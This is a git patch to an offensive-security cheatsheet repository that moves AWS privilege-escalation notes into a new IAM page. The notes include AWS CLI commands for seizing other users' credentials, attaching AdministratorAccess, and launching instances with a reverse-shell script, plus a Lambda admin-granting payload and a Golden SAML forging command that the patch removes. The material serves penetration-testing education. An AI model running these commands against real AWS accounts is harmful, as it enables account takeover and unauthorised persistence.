From 145dab988a6cdf32e12398a29d8255874968cd4e Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Tue, 2 Jan 2024 00:01:14 +0100 Subject: [PATCH] AWS - Pages v0.2 --- docs/cloud/aws/AWS Pentest.md | 158 +---------------------------- docs/cloud/aws/aws-access-token.md | 19 ++++ docs/cloud/aws/aws-cognito.md | 2 +- docs/cloud/aws/aws-dynamodb.md | 2 +- docs/cloud/aws/aws-ec2.md | 2 +- docs/cloud/aws/aws-enumeration.md | 6 +- docs/cloud/aws/aws-iam.md | 110 ++++++++++++++++++++ docs/cloud/aws/aws-lambda.md | 2 +- docs/cloud/aws/aws-metadata.md | 5 +- docs/cloud/aws/aws-s3-bucket.md | 4 +- docs/cloud/aws/aws-ssm.md | 2 +- 11 files changed, 147 insertions(+), 165 deletions(-) create mode 100644 docs/cloud/aws/aws-iam.md diff --git a/docs/cloud/aws/AWS Pentest.md b/docs/cloud/aws/AWS Pentest.md index 88b6d39..d586444 100644 --- a/docs/cloud/aws/AWS Pentest.md +++ b/docs/cloud/aws/AWS Pentest.md @@ -1,156 +1,9 @@ -# Cloud - AWS - -## AWS - Shadow Admin - -### Admin equivalent permission - -- AdministratorAccess - - ```powershell - "Action": "*" - "Resource": "*" - ``` - -- **ec2:AssociateIamInstanceProfile** : attach an IAM instance profile to an EC2 instance - ```powershell - aws ec2 associate-iam-instance-profile --iam-instance-profile Name=admin-role --instance-id i-0123456789 - ``` - -- **iam:CreateAccessKey** : create a new access key to another IAM admin account - ```powershell - aws iam create-access-key –user-name target_user - ``` - -- **iam:CreateLoginProfile** : add a new password-based login profile, set a new password for an entity and impersonate it - ```powershell - $ aws iam create-login-profile –user-name target_user –password '|[3rxYGGl3@`~68)O{,-$1B”zKejZZ.X1;6T}f;/CQQeXSo>}th)KZ7v?\\hq.#@dh49″=fT;|,lyTKOLG7J[qH$LV5U<9`O~Z”,jJ[iT-D^(' –no-password-reset-required - ``` - -- **iam:UpdateLoginProfile** : reset other IAM users’ login passwords. - ```powershell - $ aws iam update-login-profile –user-name target_user –password '|[3rxYGGl3@`~68)O{,-$1B”zKejZZ.X1;6T}f;/CQQeXSo>}th)KZ7v?\\hq.#@dh49″=fT;|,lyTKOLG7J[qH$LV5U<9`O~Z”,jJ[iT-D^(' –no-password-reset-required - ``` - -- **iam:AttachUserPolicy**, **iam:AttachGroupPolicy** or **iam:AttachRolePolicy** : attach existing admin policy to any other entity he currently possesses - ```powershell - $ aws iam attach-user-policy –user-name my_username –policy-arn arn:aws:iam::aws:policy/AdministratorAccess - $ aws iam attach-user-policy –user-name my_username –policy-arn arn:aws:iam::aws:policy/AdministratorAccess - $ aws iam attach-role-policy –role-name role_i_can_assume –policy-arn arn:aws:iam::aws:policy/AdministratorAccess - ``` - -- **iam:PutUserPolicy**, **iam:PutGroupPolicy** or **iam:PutRolePolicy** : added inline policy will allow the attacker to grant additional privileges to previously compromised entities. - ```powershell - $ aws iam put-user-policy –user-name my_username –policy-name my_inline_policy –policy-document file://path/to/administrator/policy.json - ``` - -- **iam:CreatePolicy** : add a stealthy admin policy -- **iam:AddUserToGroup** : add into the admin group of the organization. - ```powershell - $ aws iam add-user-to-group –group-name target_group –user-name my_username - ``` - -- **iam:UpdateAssumeRolePolicy** + **sts:AssumeRole** : change the assuming permissions of a privileged role and then assume it with a non-privileged account. - ```powershell - $ aws iam update-assume-role-policy –role-name role_i_can_assume –policy-document file://path/to/assume/role/policy.json - ``` - -- **iam:CreatePolicyVersion** & **iam:SetDefaultPolicyVersion** : change customer-managed policies and change a non-privileged entity to be a privileged one. - ```powershell - $ aws iam create-policy-version –policy-arn target_policy_arn –policy-document file://path/to/administrator/policy.json –set-as-default - $ aws iam set-default-policy-version –policy-arn target_policy_arn –version-id v2 - ``` - -- **lambda:UpdateFunctionCode** : give an attacker access to the privileges associated with the Lambda service role that is attached to that function. - ```powershell - $ aws lambda update-function-code –function-name target_function –zip-file fileb://my/lambda/code/zipped.zip - ``` - -- **glue:UpdateDevEndpoint** : give an attacker access to the privileges associated with the role attached to the specific Glue development endpoint. - ```powershell - $ aws glue –endpoint-name target_endpoint –public-key file://path/to/my/public/ssh/key.pub - ``` - - -- **iam:PassRole** + **ec2:CreateInstanceProfile**/**ec2:AddRoleToInstanceProfile** : an attacker could create a new privileged instance profile and attach it to a compromised EC2 instance that he possesses. - -- **iam:PassRole** + **ec2:RunInstance** : give an attacker access to the set of permissions that the instance profile/role has, which again could range from no privilege escalation to full administrator access of the AWS account. - ```powershell - # add ssh key - $ aws ec2 run-instances –image-id ami-a4dc46db –instance-type t2.micro –iam-instance-profile Name=iam-full-access-ip –key-name my_ssh_key –security-group-ids sg-123456 - # execute a reverse shell - $ aws ec2 run-instances –image-id ami-a4dc46db –instance-type t2.micro –iam-instance-profile Name=iam-full-access-ip –user-data file://script/with/reverse/shell.sh - ``` - -- **iam:PassRole** + **lambda:CreateFunction** + **lambda:InvokeFunction** : give a user access to the privileges associated with any Lambda service role that exists in the account. - ```powershell - $ aws lambda create-function –function-name my_function –runtime python3.6 –role arn_of_lambda_role –handler lambda_function.lambda_handler –code file://my/python/code.py - $ aws lambda invoke –function-name my_function output.txt - ``` - Example of code.py - ```python - import boto3 - def lambda_handler(event, context): - client = boto3.client('iam') - response = client.attach_user_policy( - UserName='my_username', - PolicyArn="arn:aws:iam::aws:policy/AdministratorAccess" - ) - return response - ``` - -* **iam:PassRole** + **glue:CreateDevEndpoint** : access to the privileges associated with any Glue service role that exists in the account. - ```powershell - $ aws glue create-dev-endpoint –endpoint-name my_dev_endpoint –role-arn arn_of_glue_service_role –public-key file://path/to/my/public/ssh/key.pub - ``` - -## AWS - Gaining AWS Console Access via API Keys - -A utility to convert your AWS CLI credentials into AWS console access. - -```powershell -$> git clone https://github.com/NetSPI/aws_consoler -$> aws_consoler -v -a AKIA[REDACTED] -s [REDACTED] -2020-03-13 19:44:57,800 [aws_consoler.cli] INFO: Validating arguments... -2020-03-13 19:44:57,801 [aws_consoler.cli] INFO: Calling logic. -2020-03-13 19:44:57,820 [aws_consoler.logic] INFO: Boto3 session established. -2020-03-13 19:44:58,193 [aws_consoler.logic] WARNING: Creds still permanent, creating federated session. -2020-03-13 19:44:58,698 [aws_consoler.logic] INFO: New federated session established. -2020-03-13 19:44:59,153 [aws_consoler.logic] INFO: Session valid, attempting to federate as arn:aws:sts::123456789012:federated-user/aws_consoler. -2020-03-13 19:44:59,668 [aws_consoler.logic] INFO: URL generated! -https://signin.aws.amazon.com/federation?Action=login&Issuer=consoler.local&Destination=https%3A%2F%2Fconsole.aws.amazon.com%2Fconsole%2Fhome%3Fregion%3Dus-east-1&SigninToken=[REDACTED -``` - - -## AWS - Golden SAML Attack - -https://www.youtube.com/watch?v=5dj4vOqqGZw -https://www.cyberark.com/threat-research-blog/golden-saml-newly-discovered-attack-technique-forges-authentication-cloud-apps/ - -> Using the extracted information, the tool will generate a forged SAML token as an arbitrary user that can then be used to authenticate to Office 365 without knowledge of that user's password. This attack also bypasses any MFA requirements. - -Requirement: -* Token-signing private key (export from personal store using Mimikatz) -* IdP public certificate -* IdP name -* Role name (role to assume) - -```powershell -$ python -m pip install boto3 botocore defusedxml enum python_dateutil lxml signxml -$ python .\shimit.py -idp http://adfs.lab.local/adfs/services/trust -pk key_file -c cert_file --u domain\admin -n admin@domain.com -r ADFS-admin -r ADFS-monitor -id 123456789012 -``` - +# Cloud - AWS ## AWSome Pentesting Cheatsheet * Created by pop3ret -## Searching for open buckets - -``` -https://buckets.grayhatwarfare.com/ -``` - ## ARN A number to identify an object in AWS @@ -1767,14 +1620,5 @@ aws ec2 describe-instances --filters "Name=subnet-id,Values=ID" ## References -* [Cloud Shadow Admin Threat 10 Permissions Protect - CyberArk](https://www.cyberark.com/threat-research-blog/cloud-shadow-admin-threat-10-permissions-protect/) * [My arsenal of AWS Security tools - toniblyx](https://github.com/toniblyx/my-arsenal-of-aws-security-tools) * [AWS Privilege Escalation method mitigation - RhinoSecurityLabs](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/) -* [AWS CLI Cheatsheet - apolloclark](https://gist.github.com/apolloclark/b3f60c1f68aa972d324b) -* [Pacu Open source AWS Exploitation framework - RhinoSecurityLabs](https://rhinosecuritylabs.com/aws/pacu-open-source-aws-exploitation-framework/) -* [PACU Spencer Gietzen - 30 juil. 2018](https://www.youtube.com/watch?v=XfetW1Vqybw&feature=youtu.be&list=PLBID4NiuWSmfdWCmYGDQtlPABFHN7HyD5) -* [Privilege escalation in the Cloud: From SSRF to Global Account Administrator - Maxime Leblanc - Sep 1, 2018](https://medium.com/poka-techblog/privilege-escalation-in-the-cloud-from-ssrf-to-global-account-administrator-fd943cf5a2f6) -* [AWS - Cheatsheet - @Magnussen](https://www.magnussen.funcmylife.fr/article_35) -* [Getting shell and data access in AWS by chaining vulnerabilities - Riyaz Walikar - Aug 29, 2019 ](https://blog.appsecco.com/getting-shell-and-data-access-in-aws-by-chaining-vulnerabilities-7630fa57c7ed) -* [Getting started with Version 2 of AWS EC2 Instance Metadata service (IMDSv2) - Sunesh Govindaraj - Nov 25, 2019](https://blog.appsecco.com/getting-started-with-version-2-of-aws-ec2-instance-metadata-service-imdsv2-2ad03a1f3650) -* [Gaining AWS Console Access via API Keys - Ian Williams - March 18th, 2020](https://blog.netspi.com/gaining-aws-console-access-via-api-keys/) \ No newline at end of file diff --git a/docs/cloud/aws/aws-access-token.md b/docs/cloud/aws/aws-access-token.md index b7bc0cb..bd8daee 100644 --- a/docs/cloud/aws/aws-access-token.md +++ b/docs/cloud/aws/aws-access-token.md @@ -80,6 +80,25 @@ print ("account id:" + "{:012d}".format(AWSAccount_from_AWSKeyID("ASIAQNZGKIQY56 * Tokyo - http://s3-ap-northeast-1.amazonaws.com +## Gaining AWS Console Access via API Keys + +A utility to convert your AWS CLI credentials into AWS console access. + +* Using [NetSPI/aws_consoler](https://github.com/NetSPI/aws_consoler) + ```powershell + $> aws_consoler -v -a AKIA[REDACTED] -s [REDACTED] + 2020-03-13 19:44:57,800 [aws_consoler.cli] INFO: Validating arguments... + 2020-03-13 19:44:57,801 [aws_consoler.cli] INFO: Calling logic. + 2020-03-13 19:44:57,820 [aws_consoler.logic] INFO: Boto3 session established. + 2020-03-13 19:44:58,193 [aws_consoler.logic] WARNING: Creds still permanent, creating federated session. + 2020-03-13 19:44:58,698 [aws_consoler.logic] INFO: New federated session established. + 2020-03-13 19:44:59,153 [aws_consoler.logic] INFO: Session valid, attempting to federate as arn:aws:sts::123456789012:federated-user/aws_consoler. + 2020-03-13 19:44:59,668 [aws_consoler.logic] INFO: URL generated! + https://signin.aws.amazon.com/federation?Action=login&Issuer=consoler.local&Destination=https%3A%2F%2Fconsole.aws.amazon.com%2Fconsole%2Fhome%3Fregion%3Dus-east-1&SigninToken=[REDACTED] + ``` + + ## References * [A short note on AWS KEY ID - Tal Be'ery - Oct 27, 2023](https://medium.com/@TalBeerySec/a-short-note-on-aws-key-id-f88cc4317489) +* [Gaining AWS Console Access via API Keys - Ian Williams - March 18th, 2020](https://blog.netspi.com/gaining-aws-console-access-via-api-keys/) \ No newline at end of file diff --git a/docs/cloud/aws/aws-cognito.md b/docs/cloud/aws/aws-cognito.md index 25064b4..2162dc8 100644 --- a/docs/cloud/aws/aws-cognito.md +++ b/docs/cloud/aws/aws-cognito.md @@ -1,4 +1,4 @@ -# AWS - Cognito +# AWS - Service - Cognito * [Cognito Scanner](https://github.com/padok-team/cognito-scanner) - A CLI tool for executing attacks on cognito such as *Unwanted account creation*, *Account Oracle* and *Identity Pool escalation*. ```bash diff --git a/docs/cloud/aws/aws-dynamodb.md b/docs/cloud/aws/aws-dynamodb.md index 50934f8..c374400 100644 --- a/docs/cloud/aws/aws-dynamodb.md +++ b/docs/cloud/aws/aws-dynamodb.md @@ -1,4 +1,4 @@ -# AWS - DynamoDB +# AWS - Service - DynamoDB > Amazon DynamoDB is a key-value and document database that delivers single-digit millisecond performance at any scale. It's a fully managed, multi-region, multi-active, durable database with built-in security, backup and restore, and in-memory caching for internet-scale applications. DynamoDB can handle more than 10 trillion requests per day and can support peaks of more than 20 million requests per second. diff --git a/docs/cloud/aws/aws-ec2.md b/docs/cloud/aws/aws-ec2.md index 7d0289b..f95e62b 100644 --- a/docs/cloud/aws/aws-ec2.md +++ b/docs/cloud/aws/aws-ec2.md @@ -1,4 +1,4 @@ -# AWS - EC2 +# AWS - Service - EC2 * [dufflebag](https://labs.bishopfox.com/dufflebag) - Find secrets that are accidentally exposed via Amazon EBS's "public" mode diff --git a/docs/cloud/aws/aws-enumeration.md b/docs/cloud/aws/aws-enumeration.md index 3d21a8f..76576c7 100644 --- a/docs/cloud/aws/aws-enumeration.md +++ b/docs/cloud/aws/aws-enumeration.md @@ -114,4 +114,8 @@ pip install -r requirements.txt ## References -* [An introduction to penetration testing AWS - Akimbocore - HollyGraceful - 06 August 2021](https://akimbocore.com/article/introduction-to-penetration-testing-aws/) \ No newline at end of file +* [An introduction to penetration testing AWS - Akimbocore - HollyGraceful - 06 August 2021](https://akimbocore.com/article/introduction-to-penetration-testing-aws/) +* [AWS CLI Cheatsheet - apolloclark](https://gist.github.com/apolloclark/b3f60c1f68aa972d324b) +* [AWS - Cheatsheet - @Magnussen](https://www.magnussen.funcmylife.fr/article_35) +* [Pacu Open source AWS Exploitation framework - RhinoSecurityLabs](https://rhinosecuritylabs.com/aws/pacu-open-source-aws-exploitation-framework/) +* [PACU Spencer Gietzen - 30 juil. 2018](https://youtu.be/XfetW1Vqybw?list=PLBID4NiuWSmfdWCmYGDQtlPABFHN7HyD5) diff --git a/docs/cloud/aws/aws-iam.md b/docs/cloud/aws/aws-iam.md new file mode 100644 index 0000000..5086742 --- /dev/null +++ b/docs/cloud/aws/aws-iam.md @@ -0,0 +1,110 @@ +# AWS - Identity & Access Management + +## AWS - Shadow Admin + +### Admin equivalent permission + +- AdministratorAccess + + ```powershell + "Action": "*" + "Resource": "*" + ``` + +- **ec2:AssociateIamInstanceProfile** : attach an IAM instance profile to an EC2 instance + ```powershell + aws ec2 associate-iam-instance-profile --iam-instance-profile Name=admin-role --instance-id i-0123456789 + ``` + +- **iam:CreateAccessKey** : create a new access key to another IAM admin account + ```powershell + aws iam create-access-key –user-name target_user + ``` + +- **iam:CreateLoginProfile** : add a new password-based login profile, set a new password for an entity and impersonate it + ```powershell + $ aws iam create-login-profile –user-name target_user –password '|[3rxYGGl3@`~68)O{,-$1B”zKejZZ.X1;6T}f;/CQQeXSo>}th)KZ7v?\\hq.#@dh49″=fT;|,lyTKOLG7J[qH$LV5U<9`O~Z”,jJ[iT-D^(' –no-password-reset-required + ``` + +- **iam:UpdateLoginProfile** : reset other IAM users’ login passwords. + ```powershell + $ aws iam update-login-profile –user-name target_user –password '|[3rxYGGl3@`~68)O{,-$1B”zKejZZ.X1;6T}f;/CQQeXSo>}th)KZ7v?\\hq.#@dh49″=fT;|,lyTKOLG7J[qH$LV5U<9`O~Z”,jJ[iT-D^(' –no-password-reset-required + ``` + +- **iam:AttachUserPolicy**, **iam:AttachGroupPolicy** or **iam:AttachRolePolicy** : attach existing admin policy to any other entity he currently possesses + ```powershell + $ aws iam attach-user-policy –user-name my_username –policy-arn arn:aws:iam::aws:policy/AdministratorAccess + $ aws iam attach-user-policy –user-name my_username –policy-arn arn:aws:iam::aws:policy/AdministratorAccess + $ aws iam attach-role-policy –role-name role_i_can_assume –policy-arn arn:aws:iam::aws:policy/AdministratorAccess + ``` + +- **iam:PutUserPolicy**, **iam:PutGroupPolicy** or **iam:PutRolePolicy** : added inline policy will allow the attacker to grant additional privileges to previously compromised entities. + ```powershell + $ aws iam put-user-policy –user-name my_username –policy-name my_inline_policy –policy-document file://path/to/administrator/policy.json + ``` + +- **iam:CreatePolicy** : add a stealthy admin policy +- **iam:AddUserToGroup** : add into the admin group of the organization. + ```powershell + $ aws iam add-user-to-group –group-name target_group –user-name my_username + ``` + +- **iam:UpdateAssumeRolePolicy** + **sts:AssumeRole** : change the assuming permissions of a privileged role and then assume it with a non-privileged account. + ```powershell + $ aws iam update-assume-role-policy –role-name role_i_can_assume –policy-document file://path/to/assume/role/policy.json + ``` + +- **iam:CreatePolicyVersion** & **iam:SetDefaultPolicyVersion** : change customer-managed policies and change a non-privileged entity to be a privileged one. + ```powershell + $ aws iam create-policy-version –policy-arn target_policy_arn –policy-document file://path/to/administrator/policy.json –set-as-default + $ aws iam set-default-policy-version –policy-arn target_policy_arn –version-id v2 + ``` + +- **lambda:UpdateFunctionCode** : give an attacker access to the privileges associated with the Lambda service role that is attached to that function. + ```powershell + $ aws lambda update-function-code –function-name target_function –zip-file fileb://my/lambda/code/zipped.zip + ``` + +- **glue:UpdateDevEndpoint** : give an attacker access to the privileges associated with the role attached to the specific Glue development endpoint. + ```powershell + $ aws glue –endpoint-name target_endpoint –public-key file://path/to/my/public/ssh/key.pub + ``` + + +- **iam:PassRole** + **ec2:CreateInstanceProfile**/**ec2:AddRoleToInstanceProfile** : an attacker could create a new privileged instance profile and attach it to a compromised EC2 instance that he possesses. + +- **iam:PassRole** + **ec2:RunInstance** : give an attacker access to the set of permissions that the instance profile/role has, which again could range from no privilege escalation to full administrator access of the AWS account. + ```powershell + # add ssh key + $ aws ec2 run-instances –image-id ami-a4dc46db –instance-type t2.micro –iam-instance-profile Name=iam-full-access-ip –key-name my_ssh_key –security-group-ids sg-123456 + # execute a reverse shell + $ aws ec2 run-instances –image-id ami-a4dc46db –instance-type t2.micro –iam-instance-profile Name=iam-full-access-ip –user-data file://script/with/reverse/shell.sh + ``` + +- **iam:PassRole** + **lambda:CreateFunction** + **lambda:InvokeFunction** : give a user access to the privileges associated with any Lambda service role that exists in the account. + ```powershell + $ aws lambda create-function –function-name my_function –runtime python3.6 –role arn_of_lambda_role –handler lambda_function.lambda_handler –code file://my/python/code.py + $ aws lambda invoke –function-name my_function output.txt + ``` + Example of code.py + ```python + import boto3 + def lambda_handler(event, context): + client = boto3.client('iam') + response = client.attach_user_policy( + UserName='my_username', + PolicyArn="arn:aws:iam::aws:policy/AdministratorAccess" + ) + return response + ``` + +* **iam:PassRole** + **glue:CreateDevEndpoint** : access to the privileges associated with any Glue service role that exists in the account. + ```powershell + $ aws glue create-dev-endpoint –endpoint-name my_dev_endpoint –role-arn arn_of_glue_service_role –public-key file://path/to/my/public/ssh/key.pub + ``` + + + +## References + +* [Cloud Shadow Admin Threat 10 Permissions Protect - CyberArk](https://www.cyberark.com/threat-research-blog/cloud-shadow-admin-threat-10-permissions-protect/) \ No newline at end of file diff --git a/docs/cloud/aws/aws-lambda.md b/docs/cloud/aws/aws-lambda.md index b923c7e..3b3f5f4 100644 --- a/docs/cloud/aws/aws-lambda.md +++ b/docs/cloud/aws/aws-lambda.md @@ -1,4 +1,4 @@ -# AWS - Lambda +# AWS - Service - Lambda ## Extract function's code diff --git a/docs/cloud/aws/aws-metadata.md b/docs/cloud/aws/aws-metadata.md index 83982b5..fd2455d 100644 --- a/docs/cloud/aws/aws-metadata.md +++ b/docs/cloud/aws/aws-metadata.md @@ -100,4 +100,7 @@ Example : https://awesomeapp.com/forward?target=http://169.254.169.254/latest/me ## References * [AWS API calls that return credentials - kmcquade](https://gist.github.com/kmcquade/33860a617e651104d243c324ddf7992a) -* [Cloud security instance metadata - PumaScan - Eric Johnson - 09 Oct 2019](https://pumascan.com/resources/cloud-security-instance-metadata/) \ No newline at end of file +* [Cloud security instance metadata - PumaScan - Eric Johnson - 09 Oct 2019](https://pumascan.com/resources/cloud-security-instance-metadata/) +* [Getting started with Version 2 of AWS EC2 Instance Metadata service (IMDSv2) - Sunesh Govindaraj - Nov 25, 2019](https://blog.appsecco.com/getting-started-with-version-2-of-aws-ec2-instance-metadata-service-imdsv2-2ad03a1f3650) +* [Privilege escalation in the Cloud: From SSRF to Global Account Administrator - Maxime Leblanc - Sep 1, 2018](https://medium.com/poka-techblog/privilege-escalation-in-the-cloud-from-ssrf-to-global-account-administrator-fd943cf5a2f6) +* [Getting shell and data access in AWS by chaining vulnerabilities - Riyaz Walikar - Aug 29, 2019 ](https://blog.appsecco.com/getting-shell-and-data-access-in-aws-by-chaining-vulnerabilities-7630fa57c7ed) \ No newline at end of file diff --git a/docs/cloud/aws/aws-s3-bucket.md b/docs/cloud/aws/aws-s3-bucket.md index d4e6589..fdaab16 100644 --- a/docs/cloud/aws/aws-s3-bucket.md +++ b/docs/cloud/aws/aws-s3-bucket.md @@ -1,4 +1,4 @@ -# AWS - S3 Buckets +# AWS - Service - S3 Buckets ## Tools @@ -31,6 +31,8 @@ $ python s3-objects-check.py -p whitebox-profile -e blackbox-profile ``` +* [grayhatwarfare/buckets](https://buckets.grayhatwarfare.com/) - Search Public Buckets + ## diff --git a/docs/cloud/aws/aws-ssm.md b/docs/cloud/aws/aws-ssm.md index ebc8aaa..179591b 100644 --- a/docs/cloud/aws/aws-ssm.md +++ b/docs/cloud/aws/aws-ssm.md @@ -1,4 +1,4 @@ -# AWS - SSM +# AWS - Service - SSM ## Command execution